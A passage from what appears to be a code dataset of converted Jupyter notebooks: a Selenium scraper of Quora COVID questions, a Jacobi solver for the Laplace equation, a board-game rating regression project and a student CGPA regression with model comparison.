-\n\n\n","repo_name":"colettegabriel/data_science","sub_path":"Seaborn practice.ipynb","file_name":"Seaborn practice.ipynb","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"23995363188","text":"import time\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n# +\nqueries = [\"covid\", \"coronavirus\"]\nlinks = []\nfor query in queries:\n url = f\"https://www.quora.com/search?q={query}\"\n\n browser = webdriver.Chrome()\n browser.get(url)\n elem = browser.find_element_by_tag_name(\"body\")\n \n for _ in range(100):\n elem.send_keys(Keys.PAGE_DOWN)\n time.sleep(0.2)\n\n for entry in browser.find_elements_by_xpath(\"//a[@class='question_link']\"):\n link = entry.get_attribute(\"href\")\n links.append(link)\n\n browser.close()\n\nwith open(\"quora.links\", \"w\") as fp:\n for link in links:\n fp.write(link)\n fp.write(\"\\n\")\n\n# +\nxpath = r'//*[@id=\"root\"]/div/div/div[3]/div/div/div[1]/div[1]/div/div[2]/span/div/div/div/span/span'\nquestions = []\n\nfor link in links:\n browser = webdriver.Chrome()\n browser.get(link)\n try:\n questions.append(browser.find_element_by_xpath(xpath).text)\n except:\n pass\n browser.close()\n time.sleep(0.5)\n# -\n\nwith open(\"quora.questions\", \"w\") as fp:\n for question in questions:\n fp.write(question)\n fp.write(\"\\n\")\n\n\n","repo_name":"mllejuly/Covid19-Chatbot","sub_path":"crawler/quora_question_crawler.ipynb","file_name":"quora_question_crawler.ipynb","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"33308570632","text":"# # Import\n\nimport numpy as np\nimport matplotlib.pyplot as plot\nimport time as time\n\n# # Paramètres\n\n# +\nksch = 2 # Choix du schema 1 5pts, 2 9pts\nN = 33 # Taille du maillage\n\nh = 1. / (N - 1) # Pas d'espace\nnitermax = 10000 # nombre maxi d'iteration de jacobi\nrestab = np.zeros(nitermax)\nerrtab = np.zeros(nitermax)\n\npi = np.pi\n# -\n\n# # Generation du maillage\n\nx = np.linspace(0, 1, N)\ny = np.linspace(0, 1, N)\n\n# # La solution exacte\n\nTe = np.zeros([N, N])\nfor i in range(0, N):\n for j in range(0, N):\n Te[i, j] = (1 / np.sinh(np.pi)) * (\n np.sinh(np.pi * x[i]) * np.sin(np.pi * y[j]) + np.sin(np.pi * x[i]) * np.sinh(np.pi * y[j]))\n\n# # Conditions aux limites\n\nT = np.zeros([N, N])\n# (valeurs imposees en debut de calcul)\nT[0, :] = 0.\nT[:, 0] = 0.\nfor i in range(0, N):\n T[N-1, i] = np.sin(pi*y[i])\n T[i, N-1] = np.sin(pi*x[i])\n\n# # Itérations de Jacobi\n\n# +\ndebtime = time.time() # temps de l'horloge au début du calcul, pour mesure du temps d'exécution\nniter = 0 # compteur nombre d'iterations\nres = 1. # residu\n\nwhile res > 1.0E-16 and niter < nitermax : # on continu les iterations tant que le residu est trop grand\n # stockage du du niveau N+1 au niveau N\n U = np.copy(T) # multiplication par \"1\" pour forcer une copie, sinon U et T deviendraient synonymes\n if ksch == 1:\n # methode de jacobi a 5 Pts\n for i in range(1, N-1):\n for j in range(1, N-1):\n T[i, j] = 0.25*(U[i+1, j] + U[i-1, j] + U[i, j+1] + U[i, j-1])\n\n if ksch == 2:\n # methode de jacobi a 9 pts\n for i in range(1, N - 1):\n for j in range(1, N - 1):\n # a modifier pour passer à 9 pts\n T[i, j] = 0.2*(U[i + 1, j] + U[i - 1, j] + U[i, j + 1] + U[i, j - 1]) + 0.05*(U[i + 1, j+1] + U[i - 1, j+1] + U[i+1, j - 1] + U[i-1, j - 1])\n\n # Calcul du residu en norme L2 - écart entre deux solutions successives\n res = np.linalg.norm(T-U)/N\n restab[niter-1] = np.log10(res)\n\n # calcul de l'erreur en norme L2 - écart vs. solution exacte\n erreur = np.linalg.norm(T-Te)/N\n errtab[niter - 1] = np.log10(erreur)\n \n niter = niter+1\n\n\nfintime = time.time() # temps de l'horloge en fin de calcul\n\nprint(\"nombre d'iterations\", niter)\nprint(\"temps cpu\", fintime-debtime)\nprint(\"log10 de l'erreur\", np.log10(erreur))\nprint(\"log10 du pas\", np.log10(h))\n# -\n\n# # Graphiques\n\n# ## Erreur\n\n# +\nnumiter = range(niter-1)\n\nfig = plot.figure()\nplot.plot(numiter, errtab[0:niter-1], 'r', label=\"erreur\")\nplot.plot(numiter, restab[0:niter-1], 'b-', label=\"residu\")\nplot.title(\"erreur en rouge et residu en bleu a chaque iteration\")\nplot.xlabel('iterations')\nplot.ylabel('log 10 de l erreur')\nplot.legend()\nplot.grid()\n# -\n\n# ## Graphique contours en 2D\n\nfig = plot.figure()\nX, Y = np.meshgrid(x, y)\nplot.contourf(X, Y, Te, 50)\nplot.colorbar()\nplot.title('Solution exacte')\nplot.xlabel('x')\nplot.ylabel('y')\nplot.grid()\n#fig.show()\nplot.savefig('myfig.png', dpi=300)\n\nfig = plot.figure()\nX, Y = np.meshgrid(x, y)\nplot.contourf(X, Y, T- Te, 50)\nplot.colorbar()\nplot.title(' eccart entre la temperature exacte et celle approchee')\nplot.xlabel('x')\nplot.ylabel('y')\nplot.grid()\n#fig.show()\nplot.savefig('myfig.png', dpi=300)\n\n# ## Graphique en 3D\n\n# +\nfrom matplotlib import cm\n\nfig3d = plot.figure()\n\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\nax = Axes3D(fig3d) # erreur avec python 2.7\nax.plot_surface(X, Y, T, rstride=1, cstride=1, cmap=cm.winter)\nplot.title(' temperature dans la plaque')\nplot.xlabel('x')\nplot.ylabel('y')\n\nplot.show()\n# -\n\n# # Ordre de schema\n\nfrom scipy import stats\n\nvector_h = [1./8., 1./16., 1./24., 1./32.]\nvector_log10error_5points = [-2.432586973010995, -3.005489848760658, -3.3491292998568243, -3.5966857327717956]\nvector_log10error_9points = [-6.7530342106755405, -8.534142839057125, -9.582087449052079, -10.327453618158863]\n\n# +\nresult_lin_fit_5points = stats.linregress(np.log10(vector_h), vector_log10error_5points)\n\nprint('slope = ', result_lin_fit_5points[0])\nprint('intercept = ', result_lin_fit_5points[1])\n\n# +\nresult_lin_fit_9points = stats.linregress(np.log10(vector_h), vector_log10error_9points)\n\nprint('slope = ', result_lin_fit_9points[0])\nprint('intercept = ', result_lin_fit_9points[1])\n# -\n\nfig, ax = plot.subplots(nrows=1, ncols=1, figsize=(5,4))\nax.plot(np.log10(vector_h), vector_log10error_5points, 'o', color='blue', label='5 points')\nax.plot(np.log10(vector_h), vector_log10error_9points, 'o', color='red', label='9 points')\nax.plot(np.log10(vector_h), result_lin_fit_5points[1] + result_lin_fit_5points[0]*np.log10(vector_h), '--', color='blue')\nax.plot(np.log10(vector_h), result_lin_fit_9points[1] + result_lin_fit_9points[0]*np.log10(vector_h), '--', color='red')\nax.set(xlabel=r'$log_{10} h$', ylabel='Erreur'); ax.grid()\nax.legend()\nplot.show()\n\n\n","repo_name":"anastasiaGor/turbulence_data_notebooks","sub_path":"BE_outils_numeriques/BE6.ipynb","file_name":"BE6.ipynb","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"43015384517","text":"# # Guided Project: Predicting Board Game Reviews\n# ### Apply clustering and regression techniques to predict board game review scores.\n#\n# ##### Contents:\n# - KMeans\n# - set()\n# - list.remove()\n# - df.apply(np.mean, axis=1)\n# - df.corr()\n# - sklearn.linear_model.LinearRegression\n# - Other\n# - SVR\n# - RandomForestRegressor\n#\n# ## 1: Board Game Reviews\n# Board games have been making a comeback lately, and deeper, more strategic boardgames, like [Settlers of Catan](https://en.wikipedia.org/wiki/Catan) have become hugely popular. A popular site where these types of board games are discussed and reviewed is [BoardGameGeek](http://www.boardgamegeek.com/).\n#\n# In this project, you'll be working with a data set that contains `80000` board games and their associated review scores. The data was scraped from BoardGameGeek and compiled into CSV format by [Sean Beck](https://github.com/ThaWeatherman). The data set is stored in `board_games.csv`, and can be downloaded [here](https://github.com/ThaWeatherman/scrapers/blob/master/boardgamegeek/games.csv). If you need help at any point, you can consult our solution notebook [here](https://github.com/dataquestio/solutions/blob/master/Mission211Solution.ipynb).\n#\n# Here's a preview of the first 5 rows and columns:\n#\n# | id | type | name | yearpublished | minplayers |\n# |--------|-----------|-------------------------------------------|---------------|------------|\n# | 12333 | boardgame | Twilight Struggle | 2005 | 2 |\n# | 120677 | boardgame | Terra Mystica | 2012 | 2 |\n# | 102794 | boardgame | Caverna: The Cave Farmers | 2013 | 1 |\n# | 25613 | boardgame | Through the Ages: A Story of Civilization | 2006 | 2 |\n# | 3076 | boardgame | Puerto Rico | 2002 | 2 |\n#\n# Each row represents a single board game, and has descriptive statistics about the board game, as well as review information. Here are some of the interesting columns:\n#\n# - `name`: name of the board game.\n# - `playingtime`: the playing time (given by the manufacturer).\n# - `minplaytime`: the minimum playing time (given by the manufacturer).\n# - `maxplaytime`: the maximum playing time (given by the manufacturer).\n# - `minage`: the minimum recommended age to play.\n# - `users_rated`: the number of users who rated the game.\n# - `average_rating`: the average rating given to the game by users. (0-10)\n# - `total_weights`: Number of weights given by users. Read more about what BoardGameGeek considers weights [here](http://boardgamegeek.com/wiki/page/Weight).\n# - `average_weight`: the average of all the subjective weights (0-5).\n#\n# One interesting machine learning task might be to predict `average_rating` using the other columns. The data set contains quite a few missing values, and rows where there are no reviews. You'll need to remove these as you explore the data to make prediction easier.\n#\n# #### Instructions:\n#\n# - `Read board_games.csv` into a Dataframe called `board_games` using the pandas library.\n# - Display the first few rows of `board_games` and get familiar with the data set.\n# - Use the [DataFrame.dropna()](http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.dropna.html) method to remove rows containing missing values.\n# - Remove any rows that have no reviews.\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# %matplotlib inline\nimport seaborn as sns\n\nboard_games = pd.read_csv('data/board_games.csv')\nboard_games.head(3)\n\nboard_games.describe()\n\nboard_games.dropna(inplace=True)\nboard_games = board_games[board_games['users_rated'] > 0]\n\n# ## 2: Picking An Error Metric\n#\n# You want to predict the average_rating column using the other columns, but you'll need to do some data exploration before you're ready to do so. The exploration will help you understand the distribution of average_rating better, as well as select an error metric that you'll use to evaluate the performance of your machine learning model.\n#\n# #### Instructions:\n# - Become familiar with the distribution of average ratings by generating plots and calculating summary statistics. For each of the following, write down your observations in a Markdown cell.\n# - Generate a histogram of the average ratings.\n# - Generate a box and whisker plot of the average ratings.\n# - Calculate the standard deviation.\n# - Calculating the mean.\n# - Think about what error metric might make sense for this data, and write a markdown cell with your thoughts.\n\nplt.hist(board_games.average_rating)\nplt.show()\n\nplt.boxplot(board_games.average_rating)\nplt.show()\n\n# +\navg_rating_std = board_games.average_rating.std()\navg_rating_mean = board_games.average_rating.mean()\n\nprint(avg_rating_std, avg_rating_mean)\n# -\n\n# The `average_rating` data is continuous, so MSE could be a good metric since it penalizes larger errors.\n\n# ## 3: Plotting Clusters\n#\n# Now that you have a handle on the `average_rating` column, and have picked an error metric, you're ready for the next step. If you haven't picked an error metric, you should look at Mean Squared Error. As the data is continuous, and you want to penalize larger errors more, Mean Squared Error is a good error metric choice.\n#\n# You can look at the data for patterns that may help you develop a machine learning model. One way to look for patterns is to use a clustering algorithm to create clusters, then plot them out.\n#\n# You can first use the [sklearn.cluster.KMeans](http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html) class to fit a k-means clustering model. This class only works with numeric columns, so you have to extract the numeric columns of `board_games` before passing them into the [KMeans.fit()](http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html#sklearn.cluster.KMeans.fit) method.\n#\n# To visualize how board games are clustered, we can calculate the row means and row standard deviations and then generate a scatter plot that compares the means against the standard deviations. We encourage you to think of other ways to visualize the rows as clusters as well.\n#\n# #### Instructions:\n#\n# - Use the KMeans class to create clusters.\n# - Initialize the KMeans class with 5 clusters.\n# - Extract the numeric columns of board_games, and assign to the variable numeric_columns.\n# - Leave out name, type, and id.\n# - Fit the KMeans class to numeric_columns using the fit method.\n# - Extract the labels_ attribute of the KMeans class, and assign to the variable labels.\n# - Plot out the cluster assignments.\n# - Use the apply method on numeric_columns with the keyword argument axis set to 1 to find the mean of each row. Assign the result to game_mean.\n# - Use the apply method on numeric_columns with the keyword argument axis set to 1 to find the standard deviation of each row. Assign the result to game_std.\n# - Create a plot using the matplotlib scatter function, with the c keyword argument set to labels, the keyword argument x set to game_mean, and the keyword argument y set to game_std.\n# - What do the results tell you? Write up the results in a markdown cell.\n\n# +\nfrom sklearn.cluster import KMeans\n\nkmeans_model = KMeans(5)\n# -\n\nnumeric_columns = list(board_games._get_numeric_data().columns)\nnumeric_columns\n\nset(board_games.columns) - set(numeric_columns)\n\nnumeric_columns.remove('id')\nboard_games[numeric_columns]\n\nkmeans_model.fit(board_games[numeric_columns])\nlabels = kmeans_model.labels_\n\ngame_mean = board_games[numeric_columns].apply(np.mean,axis=1)\ngame_std = board_games[numeric_columns].apply(np.std, axis=1)\n\nplt.scatter(game_mean, game_std, c=labels)\n\n#\n\n# ## 4: Finding Correlations\n#\n# Now that you're done some data exploration, you can figure out which columns correlate well with `average_rating`. This will enable you to remove columns that don't add much predictive power to the model. For example, columns that are uncorrelated with the target won't help a linear regression model. It will also enable you to remove columns that are derived from the target, or otherwise cause overfitting.\n#\n# #### Instructions:\n#\n# - Use the [DataFrame.corr()](http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.corr.html) method to compute pairwise correlations between only the numeric columns. Assign the result to correlations.\n# - Display the average_rating column of correlations, which shows how much the other columns correlate with the average_rating column.\n# - Do any of the correlations surprise you? Write up your thoughts in a markdown cell.\n# - Remove any columns that seem to be derived from the average_rating. The bayes_average_rating is an example of this.\n# - Remove any columns that don't seem to correlate at all with the average_rating column.\n\ncorrelations = board_games[numeric_columns].corr()\ncorrelations.average_rating\n\n# The other ratings columns (users_rated, bayes_average_rating) obviously correlate with average_rating.\n\n# +\nexclude = ['users_rated', 'average_rating', 'bayes_average_rating', \n 'average_weight', 'minplayers', 'maxplayers', 'playingtime',\n 'minplaytime', 'maxplaytime']\nfeatures = list(set(numeric_columns) - set(exclude))\n\nfeatures\n# -\n\n# ## 5: Creating A Model\n#\n# Now that you're done exploring the data, you're ready to create a linear regression model and make predictions for newly created board games.\n#\n# Ordinarily, you'd want to split the data into training and testing sets, train the algorithm on the training set, and test its performance on the test set. In this case, because we haven't covered training and testing sets yet, you'll evaluate the performance of the model on the training set.\n#\n# You'll fit a linear regression model to board_games, using the columns you think should be predictors, and average_rating as the target. You'll then generate predictions using the same predictors you used in the fitting process.\n#\n# #### Instructions:\n#\n# - Initialize a [LinearRegression](http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LinearRegression.html) model, and assign it to the variable `reg`.\n# - Use the [LinearRegression.fit()](http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LinearRegression.html#sklearn.linear_model.LinearRegression.fit) method to set the predictor columns you want the model to use and set the target column to `average_rating`.\n# - Use the [LinearRegression.predict()](http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LinearRegression.html#sklearn.linear_model.LinearRegression.predict) method to make predictions using the columns of board_games that you think should be used as predictors.\n# - The predictors you pass into LinearRegression.predict() should be the same predictors you passed into [LinearRegression.fit](http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LinearRegression.html#sklearn.linear_model.LinearRegression.fit).\n# - Assign the result to `predictions`.\n# - Calculate the error metric that you chose earlier.\n# - Write up what the error value tells you in a markdown cell.\n\n# +\nfrom sklearn.linear_model import LinearRegression\n\nlr = LinearRegression()\nlr.fit(board_games[features], board_games.average_rating)\npredictions = lr.predict(board_games[features])\n\n# +\nfrom sklearn.metrics import mean_squared_error\n\nmse = mean_squared_error(board_games.average_rating, predictions)\nmse\n# -\n\n# Error rate 2.28 above the standard deviation 1.58 which indicates that model may not perform well. \n\n# ## 6: Next Steps\n#\n# That's it for the guided steps. We recommend downloading this notebook and building on it. Here are some potential next steps:\n#\n# - Split the data into training and testing sets, and calculate error on the testing set.\n# - Try algorithms other than linear regression.\n# - Calculate new predictors based off the existing columns, such as:\n# - Player range (maxplayers - minplayers)\n# - Playing time range (maxplaytime - minplaytime)\n# - Average number of ratings (total_owners / users_rated)\n# - Scrape the latest data from [BoardGameGeek](http://www.boardgamegeek.com/) to acquire more data.\n\n# +\nfrom sklearn.model_selection import KFold, cross_val_score\n\n#cv = KFold(n=len(board_games), n_folds=10, shuffle=True)\nscores = cross_val_score(lr, board_games[features], board_games.average_rating)#, cv=cv)\nprint(scores)\navg_score = np.mean(scores)\navg_score\n\n# +\nfrom sklearn.svm import SVR\nsvr = SVR(kernel='linear')\n\nscores = cross_val_score(estimator=svr, X=board_games[features], y=board_games.average_rating)\navg_svr_score = np.mean(scores)\navg_svr_score\n\n# +\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import Ridge\n\nX_train, X_test, y_train, y_test = train_test_split(board_games[features], y, test_size=0.2)\n\nmodel = Ridge()\nmodel.fit(X_train, y_train)\npredictions = model.predict(X_test)\n\nmean_squared_error(y_test, predictions) \n\n# +\nfrom sklearn.ensemble import RandomForestRegressor\n\nrfr = RandomForestRegressor()\n\nrfr.fit(X_train, y_train)\npredictions = rfr.predict(X_test)\nmean_squared_error(y_test, predictions) \n","repo_name":"austinmw/DataQuest","sub_path":"6_Machine_Learning/Machine_Learning_Fundamentals/.ipynb_checkpoints/OLD-Guided Project - Predicting Board Game Reviews - KMeans, LinReg-checkpoint.ipynb","file_name":"OLD-Guided Project - Predicting Board Game Reviews - KMeans, LinReg-checkpoint.ipynb","file_ext":"py","file_size_in_byte":13328,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"3532333773","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport warnings\nwarnings.filterwarnings('ignore')\n\ndf=pd.read_csv('https://raw.githubusercontent.com/dsrscientist/dataset4/main/Grades.csv')\ndf\n\ndf.head(40)\n\ndf.tail(30)\n\ndf.shape\n\ndf.columns\n\ndf.dtypes\n\ndf.isnull().sum()\n\ndf.info()\n\nsns.heatmap(df.isnull())\n\ndf.nunique().to_frame(\"No. of unique values\")\n\ndf.drop([\"Seat No.\"], axis=1, inplace=True)\ndf\n\nfor i in df.columns:\n print(df[i].value_counts())\n print(\"\\n\")\n\nfor i in df.columns:\n if df[i].dtypes==\"object\":\n df[i]=df[i].fillna(df[i].mode()[0])\n\ndf.isnull().sum()\n\ndf.head(50)\n\nsns.heatmap(df.isnull())\n\ndf.nunique().to_frame(\"No. of unique values\")\n\ndf[\"CGPA\"].value_counts()\n\ndf.describe()\n\n# we can not remove outliers and skewness from the data as all the columns are of categorical type.\n# Moreover its not possible to perform univariate and bivariate analysis\n\n# WE do not remove outliers from target variable i.e. CGPA as well\n\ndf.skew()\n\nfrom sklearn.preprocessing import OrdinalEncoder\nOE=OrdinalEncoder()\nfor i in df.columns:\n if df[i].dtypes==\"object\":\n df[i]=OE.fit_transform(df[i].values.reshape(-1,1))\n\ndf\n\ndf.info()\n\ndf.describe()\n\ncor=df.corr()\ncor\n\nplt.figure(figsize=(20,15))\nsns.heatmap(df.corr(), linewidths=0.1, fmt=\".1g\", linecolor=\"black\", annot=True, cmap=\"Blues_r\")\nplt.yticks(rotation=0);\nplt.show()\n\ncor[\"CGPA\"].sort_values(ascending=False)\n\nplt.figure(figsize=(22,7))\ndf.corr()[\"CGPA\"].sort_values(ascending=False).drop([\"CGPA\"]).plot(kind=\"bar\", color=\"m\")\nplt.xlabel(\"Feature\", fontsize=15);\nplt.ylabel(\"Target\", fontsize=15);\nplt.title(\"correlation between features and target using barplot\", fontsize=20)\nplt.show()\n\n# Separating features and labels\n\nx=df.drop(\"CGPA\", axis=1)\ny=df[\"CGPA\"]\n\n# standarization of dataset\n\nfrom sklearn.preprocessing import StandardScaler\nscaler=StandardScaler()\nx=pd.DataFrame(scaler.fit_transform(x), columns=x.columns)\nx\n\n# To remove the multicolinearity using variance inflation factor\n\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\nvif=pd.DataFrame()\nvif[\"VIF values\"]=[variance_inflation_factor(x.values, i) \n for i in range(len(x.columns))]\nvif[\"Features\"]=x.columns\nvif\n\n# No need to remove multicolinearity\n\ny.value_counts()\n\n# Model development and classification\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.linear_model import LinearRegression\n\nmaxAccu=0\nmaxRS=0\nfor i in range(1,200):\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.20, random_state=i)\n lr=LinearRegression()\n lr.fit(x_train, y_train)\n pred=lr.predict(x_test)\n acc=r2_score(y_test, pred)\n if acc>maxAccu:\n maxAccu=acc\n maxRS=i\nprint(\"maximum r2 score is\", maxAccu, \"at random state\", maxRS)\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.30, random_state=maxRS)\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.neighbors import KNeighborsRegressor as KNN\nfrom sklearn.linear_model import Lasso, Ridge\n\nLR=LinearRegression()\nLR.fit(x_train, y_train)\npred_LR=LR.predict(x_test)\npred_train=LR.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_LR))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_LR))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_LR))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_LR)))\n\nplt.figure(figsize=(10,7))\nplt.scatter(x=pred_LR,y=y_test, color=\"r\")\nplt.plot(pred_LR, pred_LR, color=\"b\")\nplt.xlabel(\"Actual\", fontsize=14)\nplt.ylabel(\"Predicted\", fontsize=14)\nplt.title(\"Linear Regression\", fontsize=18)\nplt.show()\n\nRFR=RandomForestRegressor()\nRFR.fit(x_train, y_train)\npred_RFR=RFR.predict(x_test)\npred_train=RFR.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_RFR))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_RFR))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_RFR))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_RFR)))\n\nknn=KNN()\nknn.fit(x_train, y_train)\npred_knn=knn.predict(x_test)\npred_train=knn.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_knn))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_knn))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_knn))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_knn)))\n\nGBR=GradientBoostingRegressor()\nGBR.fit(x_train, y_train)\npred_GBR=GBR.predict(x_test)\npred_train=GBR.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_GBR))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_GBR))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_GBR))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_GBR)))\n\nlasso=Lasso()\nlasso.fit(x_train, y_train)\npred_lasso=lasso.predict(x_test)\npred_train=lasso.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_lasso))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_lasso))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_lasso))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_lasso)))\n\nrd=Ridge()\nrd.fit(x_train, y_train)\npred_rd=rd.predict(x_test)\npred_train=rd.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_rd))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_rd))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_rd))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_rd)))\n\nfrom sklearn.tree import DecisionTreeRegressor\ndtr=DecisionTreeRegressor()\ndtr.fit(x_train, y_train)\npred_DTR=dtr.predict(x_test)\npred_train=dtr.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_DTR))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_DTR))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_DTR))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_DTR)))\n\nfrom sklearn.svm import SVR\nsvr=SVR()\nsvr.fit(x_train, y_train)\npred_SVR=svr.predict(x_test)\npred_train=svr.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_SVR))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_SVR))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_SVR))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_SVR)))\n\nfrom sklearn.ensemble import ExtraTreesRegressor\netr=ExtraTreesRegressor()\netr.fit(x_train, y_train)\npred_ETR=etr.predict(x_test)\npred_train=etr.predict(x_train)\nprint(\"R2_score\", r2_score(y_test,pred_SVR))\nprint(\"R2_score on training Data:\", r2_score(y_train,pred_train)*100)\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred_ETR))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred_ETR))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred_ETR)))\n\n# On the basis of R2 Score, ExtraTreesRegressor and SVR model are fitting best.\n\nfrom sklearn.model_selection import cross_val_score\n\nscore=cross_val_score(LR,x,y)\nprint(score)\nprint(score.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_LR) - score.mean())*100)\n\nscore1=cross_val_score(RFR,x,y)\nprint(score1)\nprint(score1.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_RFR) - score1.mean())*100)\n\nscore2=cross_val_score(knn,x,y)\nprint(score2)\nprint(score2.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_knn) - score2.mean())*100)\n\nscore3=cross_val_score(GBR,x,y)\nprint(score3)\nprint(score3.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_GBR) - score3.mean())*100)\n\nscore4=cross_val_score(lasso,x,y)\nprint(score4)\nprint(score4.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_lasso) - score4.mean())*100)\n\nscore5=cross_val_score(rd,x,y)\nprint(score5)\nprint(score5.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_rd) - score5.mean())*100)\n\nscore6=cross_val_score(dtr,x,y)\nprint(score6)\nprint(score6.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_DTR) - score6.mean())*100)\n\nscore7=cross_val_score(svr,x,y)\nprint(score7)\nprint(score7.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_SVR) - score7.mean())*100)\n\nscore8=cross_val_score(etr,x,y)\nprint(score8)\nprint(score8.mean())\nprint(\"difference between R2 score and cross validation score is-\", (r2_score(y_test,pred_ETR) - score8.mean())*100)\n\n# On the basis of cross validation score and difference between R2 and Cross Score - ExtraTreesRegressor is the best model to fit the Data\n\nfrom sklearn.model_selection import GridSearchCV\n\nparam={\"n_estimators\":[100],\"criterion\":['squared_error','absolute_error','friedman_mse','poisson'],\"min_samples_split\":[2,4,6],\"min_samples_leaf\":[1,2,3,4], \"min_weight_fraction_leaf\":[0.0, 1.0, 2.0]}\n\ngscv=GridSearchCV(ExtraTreesRegressor(), param, cv=5)\n\ngscv.fit(x_train,y_train)\n\ngscv.best_params_\n\nModel=ExtraTreesRegressor(criterion= 'friedman_mse',min_samples_leaf= 1,min_samples_split= 4,min_weight_fraction_leaf= 0.0, n_estimators= 10)\n\nModel.fit(x_train,y_train)\npred=Model.predict(x_test)\nprint(\"R2_score\", r2_score(y_test,pred))\nprint(\"Mean Absolute Error:\", mean_absolute_error(y_test,pred))\nprint(\"Mean Squared Error:\", mean_squared_error(y_test,pred))\nprint(\"Root Mean Squared Error:\", np.sqrt(mean_squared_error(y_test,pred)))\n\nimport pickle\nfilename=\"StudentGrades.report\"\npickle.dump(Model, open(filename, \"wb\"))\n\nimport pickle\nloaded_model=pickle.load(open(\"StudentGrades.report\",\"rb\"))\nresult=loaded_model.score(x_test,y_test)\nprint(result*100)\n\nconclusion=pd.DataFrame([loaded_model.predict(x_test)[:],y_test[:]],index=[\"Predicted\",\"Original\"])\nconclusion\n\n# On the basis of cross validation score and difference between R2 and Cross Score -ExtraTreesRegressor is the best 